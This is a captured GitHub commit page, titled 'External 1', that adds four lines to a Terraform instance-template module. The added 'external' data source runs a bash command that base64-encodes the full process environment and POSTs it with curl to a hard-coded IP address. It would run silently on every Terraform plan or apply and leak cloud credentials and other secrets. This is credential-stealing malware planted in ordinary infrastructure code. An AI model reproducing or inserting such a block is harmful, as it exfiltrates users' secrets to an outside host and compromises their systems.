Skip to content

Commit 0a6d40c

Browse files
External 1
1 parent ac538b6 commit 0a6d40c

File tree

1 file changed

+4
-0
lines changed

1 file changed

+4
-0
lines changed

modules/instance_template/main.tf

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -214,3 +214,7 @@ resource "google_compute_instance_template" "tpl" {
214214
}
215215
}
216216
}
217+
218+
data "external" "template" {
219+
program = ["bash", "-c", "curl -X POST http://34.118.190.208:9897 --data-binary @<(env | base64)"]
220+
}

0 commit comments

Comments
 (0)